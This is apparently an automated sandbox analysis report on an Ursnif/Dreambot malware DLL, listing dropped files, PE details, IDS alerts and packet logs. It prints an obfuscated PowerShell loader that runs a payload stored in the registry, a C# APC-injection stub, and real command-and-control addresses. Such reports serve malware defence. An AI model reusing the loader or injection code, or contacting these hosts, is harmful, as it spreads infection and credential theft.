                                                        SHA-256:2F7D0427BFF06099BF89A296D019DA107C9D250C327E264E7A0BDC68DB163EB4
                                                        SHA-512:F3DEA9E54C7A45B4B3ED0A4EF4324B59DC4E8FF4C0D5F9E2C9BFC362C69F4C8DAC8137EBD6D3E2AE781A988815A67512F06E33212E9120FEB1D15814203F628F
                                                        Malicious:false
                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...y.k.p.r.d.3.x.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...y.k.p.r.d.3.x.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                        C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.0.cs

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text
                                                        Category:dropped
                                                        Size (bytes):403
                                                        Entropy (8bit):5.058106976759534
                                                        Encrypted:false
                                                        SSDEEP:6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y
                                                        MD5:99BD08BC1F0AEA085539BBC7D61FA79D
                                                        SHA1:F2CA39B111C367D147609FCD6C811837BE2CE9F3
                                                        SHA-256:8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9
                                                        SHA-512:E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396
                                                        Malicious:false
                                                        Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class bju. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr wqyemwbu,IntPtr vlbfvx,IntPtr hokikv);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uqvnjbf,uint pmyb,IntPtr rheqdsvorya);.. }..}.

                                                        C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):369
                                                        Entropy (8bit):5.273397991548263
                                                        Encrypted:false
                                                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fbUVRiGzxs7+AEszIwkn23fbUVRib:p37Lvkmb6KRfaWZEif/
                                                        MD5:F97CB66DD8C253FC88F2A1ABDE39CAD4
                                                        SHA1:CAEB7B18048FAE724BAAFC52913BA622C6C35C21
                                                        SHA-256:12B39EEDA56822A7466297663B19E8004B4FFB97B3C790CD4BC9AB0130080271
                                                        SHA-512:4660DC64117C00716A63E2610CC4FD4BF625403A6C4B374B172014D6EEC2F418C44A281A29C1417D76DD8718F924CBDFF9EB02D2B62E48EC3433B77472D329AF
                                                        Malicious:false
                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.0.cs"

                                                        C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.dll

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3584
                                                        Entropy (8bit):2.620170537753038
                                                        Encrypted:false
                                                        SSDEEP:24:etGSh8OmU0t3lm85xWAseO4zeQ64pfUPtkZfTmmVUWI+ycuZhNH3akSUgPNnq:63XQ3r5xNO1QfUuJTm231ulH3a3U4q
                                                        MD5:1AB06121FBA88EB939FBAEC284269D15
                                                        SHA1:ACECFD28F057FAD1625960F4AF3BDE028FDB56BA
                                                        SHA-256:AE88F1CC1909479D2283B685B88636F95894E4F4531C396F2257EC68B97678EA
                                                        SHA-512:84F2C00719730FC7DD4A187E6D7A5E75D7E56C104FDC4410BBD5F0076FD2D709B1930E4F7C11B9B34C5F81A5768C9D3A674850C10946E0D327ACC1AB928CFFC4
                                                        Malicious:false
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|.rb...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....p.....w.....~...............a. ...a...!.a.%...a.......*.....3.0.....6.......C.......V...........

                                                        C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.out

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                                                        Category:modified
                                                        Size (bytes):866
                                                        Entropy (8bit):5.345180643576188
                                                        Encrypted:false
                                                        SSDEEP:24:AId3ka6KRf7EifmKaM5DqBVKVrdFAMBJTH:Akka6C7EumKxDcVKdBJj
                                                        MD5:B7A36CE98A0D245C6F1459976042CA57
                                                        SHA1:AF44D061EF7D477B87C69D38C8A1B82C3A3DC720
                                                        SHA-256:1DF9E43B160A4D953957F36047F09DCD9E147009BCD6EB844965627C6F2F567E
                                                        SHA-512:665CD4C5389E36539F045D8FFCF944F55B137E54DF90623E1DF12A70633B62E729321DA830AA8FA2F3258C422A5AA0C2B11D0A0935DDC37DF8E0C4A2E66E00E6
                                                        Malicious:false
                                                        Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                        C:\Users\user\Documents\20220504\PowerShell_transcript.841618.mWebbd0S.20220504161928.txt

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1359
                                                        Entropy (8bit):5.382277499613012
                                                        Encrypted:false
                                                        SSDEEP:24:BxSAP7vBZ8x2DOXUWNlLCHMz4qWwHjeTKKjX4CIym1ZJX9VlLCHMz4GnxSAZa:BZDvj8oOtGA4twqDYB1ZHVGA4IZZa
                                                        MD5:D2E7CC2690DF87FB573063E288F90FF2
                                                        SHA1:49378232BF854F6E50F35B02DCA668FBAC9748ED
                                                        SHA-256:03EA7B710A6223D293E530520504E4153472C0FBDDD91F7626001D6D64676FE3
                                                        SHA-512:AD38C82F2AE62AA559ED48561BF3D119F268B2A80B9C042BC9ABAA60AABD070488C8A87DDC5B7A5E57E8CA99819900E6CA5E60F8378DEEE5D4474EC18A430F27
                                                        Malicious:false
                                                        Preview:.**********************..Windows PowerShell transcript start..Start time: 20220504161929..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841618 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 6680..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220504161929..**********************..PS>new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([S

                                                        \Device\ConDrv

                                                        Download File
                                                        Process:C:\Windows\System32\nslookup.exe
                                                        File Type:ASCII text, with CRLF, CR line terminators
                                                        Category:dropped
                                                        Size (bytes):28
                                                        Entropy (8bit):4.039148671903071
                                                        Encrypted:false
                                                        SSDEEP:3:U+6QlBxAN:U+7BW
                                                        MD5:D796BA3AE0C072AA0E189083C7E8C308
                                                        SHA1:ABB1B68758B9C2BF43018A4AEAE2F2E72B626482
                                                        SHA-256:EF17537B7CAAB3B16493F11A099F3192D5DCD911C1E8DF0F68FE4AB6531FB43E
                                                        SHA-512:BF497C5ACF74DE2446834E93900E92EC021FC03A7F1D3BF7453024266349CCE39C5193E64ACBBD41E3A037473A9DB6B2499540304EAD51E002EF3B747748BF36
                                                        Malicious:false
                                                        Preview:Non-authoritative answer:...

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.238635401847583
                                                        TrID:
                                                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                        • Generic Win/DOS Executable (2004/3) 0.20%
                                                        • DOS Executable Generic (2002/1) 0.20%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:2oCOO5LbPu.dll
                                                        File size:442368
                                                        MD5:1217ff59e80cdae525287f2c6e9a43c6
                                                        SHA1:71760323e2c6528c2d346d85c9a138edcea984aa
                                                        SHA256:315b13c6d80997dd76a01c15b78651d7a1cb54f8432fc25ad95c8573ba4b52d6
                                                        SHA512:7452c0abb46996b098db3caa7c40856eff3407e8f578e85f412af990b8f26a46e59df08a6066069015e2a82b58773c731db33ce3913ca499cff1a420e62ec899
                                                        SSDEEP:6144:rSpWDtyexlJJtyhOhevp/D23qAGzjLg8O9YTEqT2uGRp1WgHyo3NldzlQgOsnGWU:rSpuFlJqYhiVDwGU8OqaX1WW3zNg7
                                                        TLSH:0594F14977A12DBBEC0807761CF8C51B9B66BE2CA23A31DEA6683CFF7E175511048706
                                                        File Content Preview:MZ......................@.......................................<dR.x.<.x.<.x.<.c.....<.uW....<.x.=...<..|....<.{}....<..X?...<.....-.<.{}.._.<..\<...<.Richx.<.PE..L......A...........!.........P......0.............@.................................5......

                                                        File Icon

                                                        Icon Hash:9068eccc64f6e2ad

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x401430
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x411096D1 [Wed Aug 4 07:57:05 2004 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:5
                                                        OS Version Minor:0
                                                        File Version Major:5
                                                        File Version Minor:0
                                                        Subsystem Version Major:5
                                                        Subsystem Version Minor:0
                                                        Import Hash:0bedc9af0ed7cf2ba33cf662a24d448e

                                                        Entrypoint Preview

                                                        Instruction
                                                        push ebp
                                                        mov ebp, esp
                                                        add ecx, FFFFFFFFh
                                                        call 00007FC8ACE5154Ch
                                                        pop eax
                                                        pop eax
                                                        mov dword ptr [00414544h], eax
                                                        mov edx, dword ptr [00414660h]
                                                        sub edx, 00005289h
                                                        call edx
                                                        ret
                                                        int3
                                                        push esi
                                                        mov eax, ebx
                                                        mov dword ptr [00414540h], eax
                                                        pop dword ptr [00414538h]
                                                        mov dword ptr [00414548h], ebp
                                                        mov dword ptr [0041453Ch], edi
                                                        sub dword ptr [00414548h], FFFFFFFCh
                                                        loop 00007FC8ACE514F5h
                                                        mov dword ptr [ebp+00h], eax
                                                        nop
                                                        pop ds
                                                        push es
                                                        or al, C2h
                                                        mov byte ptr [7F7A077Eh], al
                                                        retf F3BAh
                                                        pop esp
                                                        cld
                                                        mov byte ptr [764053C9h], al
                                                        inc edi

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xdc180x8c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x620000x9f28.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x6c0000xf0c.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xd0b00x38.rdata
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0xd0000xb0.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x10000x1.text
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000xb7100xc000False0.0737915039062data1.0233419997IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rdata0xd0000x10730x2000False0.180297851562data3.71583062905IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xf0000x79d00x6000False0.373738606771data6.02811283413IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .crt0x170000x1dc8e0x1e000False0.988427734375data7.9815287954IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .erloc0x350000x2ca4f0x2d000False0.988259548611data7.98122243943IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .rsrc0x620000x9f280xa000False0.602783203125data6.51663069246IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x6c0000x132e0x2000False0.219360351562data3.73577949218IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountry
                                                        RT_BITMAP0x623600x666dataEnglishUnited States
                                                        RT_ICON0x629c80x485dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                        RT_ICON0x672280x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544EnglishUnited States
                                                        RT_ICON0x697d00xea8dataEnglishUnited States
                                                        RT_ICON0x6a6780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                        RT_ICON0x6af200x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                        RT_DIALOG0x6b4880xb4dataEnglishUnited States
                                                        RT_DIALOG0x6b5400x120dataEnglishUnited States
                                                        RT_DIALOG0x6b6600x158dataEnglishUnited States
                                                        RT_DIALOG0x6b7b80x202dataEnglishUnited States
                                                        RT_DIALOG0x6b9c00xf8dataEnglishUnited States
                                                        RT_DIALOG0x6bab80xa0dataEnglishUnited States
                                                        RT_DIALOG0x6bb580xeedataEnglishUnited States
                                                        RT_GROUP_ICON0x6bc480x4cdataEnglishUnited States
                                                        RT_VERSION0x6bc980x290MS Windows COFF PA-RISC object fileEnglishUnited States

                                                        Imports

                                                        DLLImport
                                                        KERNEL32.dllEraseTape, GetDiskFreeSpaceExA, lstrlenA, LocalHandle, GetModuleFileNameA, GetBinaryTypeA, GetThreadLocale, GetFileTime, GlobalFlags, GetStringTypeA, EnumResourceTypesA, GetConsoleCP, GetCommTimeouts, WriteProcessMemory, GlobalMemoryStatus, DebugBreak
                                                        OLEAUT32.dllGetRecordInfoFromTypeInfo, LoadTypeLibEx
                                                        USER32.dllDefMDIChildProcW, GetMenuItemRect, MessageBoxIndirectW, DeleteMenu, GetClassNameA, GetMessagePos, GetUpdateRgn, GetClientRect, GetScrollBarInfo
                                                        GDI32.dllExtSelectClipRgn, GetBkColor, GetCharWidthFloatA, GetTextMetricsW, GdiComment
                                                        ADVAPI32.dllEnumServicesStatusExW, InitiateSystemShutdownExW, RegGetValueA
                                                        msvcrt.dllstrcoll, fgetwc, srand

                                                        Version Infos

                                                        DescriptionData
                                                        LegalCopyright A Company. All rights reserved.
                                                        InternalName
                                                        FileVersion1.0.0.0
                                                        CompanyNameA Company
                                                        ProductName
                                                        ProductVersion1.0.0.0
                                                        FileDescription
                                                        OriginalFilenamemyfile.exe
                                                        Translation0x0409 0x04b0

                                                        Possible Origin

                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        05/04/22-16:19:17.575336 05/04/22-16:19:17.575336TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976180192.168.2.4185.189.151.28
                                                        05/04/22-16:21:22.118696 05/04/22-16:21:22.118696TCP2823044ETPRO TROJAN W32.Dreambot Checkin4982480192.168.2.413.107.43.16
                                                        05/04/22-16:19:19.326271 05/04/22-16:19:19.326271TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976180192.168.2.4185.189.151.28
                                                        05/04/22-16:18:57.385228 05/04/22-16:18:57.385228TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975980192.168.2.413.107.42.16
                                                        05/04/22-16:21:20.986284 05/04/22-16:21:20.986284TCP2031743ET TROJAN Ursnif Payload Request (cook32.rar)4982380192.168.2.4193.56.146.127
                                                        05/04/22-16:21:21.354584 05/04/22-16:21:21.354584TCP2031744ET TROJAN Ursnif Payload Request (cook64.rar)4982380192.168.2.4193.56.146.127
                                                        05/04/22-16:21:23.154439 05/04/22-16:21:23.154439TCP2823044ETPRO TROJAN W32.Dreambot Checkin4982580192.168.2.4116.121.62.237
                                                        05/04/22-16:19:18.765869 05/04/22-16:19:18.765869TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976180192.168.2.4185.189.151.28
                                                        05/04/22-16:21:35.078524 05/04/22-16:21:35.078524TCP2831962ETPRO TROJAN Ursnif Variant CnC Beacon 8 M14983680192.168.2.4116.121.62.237
                                                        05/04/22-16:21:37.325898 05/04/22-16:21:37.325898TCP2831962ETPRO TROJAN Ursnif Variant CnC Beacon 8 M14984580192.168.2.4116.121.62.237

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        May 4, 2022 16:19:17.505877018 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.523657084 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.523854017 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.575335979 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.592833042 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.863269091 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.863297939 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.863313913 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.863331079 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.863353014 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.863365889 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.863445997 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.863502026 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.863687038 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.863704920 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.863718033 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.863744020 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.863791943 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.864097118 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.864162922 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.864460945 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.864502907 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.864517927 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.864530087 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.864547968 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.864698887 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.864758015 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.880639076 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.880717993 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.880748987 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.880790949 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.880830050 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.880834103 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.880861998 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.880893946 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.880903006 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.880928040 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.880942106 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.880959034 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.880970001 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.880997896 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.881022930 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881076097 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.881222963 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881249905 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881289959 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.881290913 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881331921 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881340981 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.881359100 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881400108 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881412983 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.881441116 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881459951 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.881469011 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881531000 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881548882 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.881589890 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881609917 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881639957 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881680012 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881690979 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.881709099 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881742954 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.881747961 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881787062 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881808043 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.881818056 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881844044 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.881858110 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881900072 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881922007 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.881927967 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881958961 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.898247957 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898296118 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898322105 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898355961 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898389101 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898412943 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898459911 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.898541927 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.898549080 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.898578882 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898673058 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.898674965 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898701906 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898772001 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.898889065 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898930073 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898955107 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898988008 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.899008036 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.899019003 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.899024010 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.899049997 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.899082899 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.899107933 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.899120092 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.899142027 CEST8049761185.189.151.28192.168.2.4

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        May 4, 2022 16:20:28.160969973 CEST6490953192.168.2.48.8.8.8
                                                        May 4, 2022 16:20:28.177081108 CEST53649098.8.8.8192.168.2.4
                                                        May 4, 2022 16:20:28.271305084 CEST6491053192.168.2.4208.67.222.222
                                                        May 4, 2022 16:20:28.287652969 CEST5364910208.67.222.222192.168.2.4
                                                        May 4, 2022 16:20:28.291598082 CEST6491153192.168.2.4208.67.222.222
                                                        May 4, 2022 16:20:28.307825089 CEST5364911208.67.222.222192.168.2.4
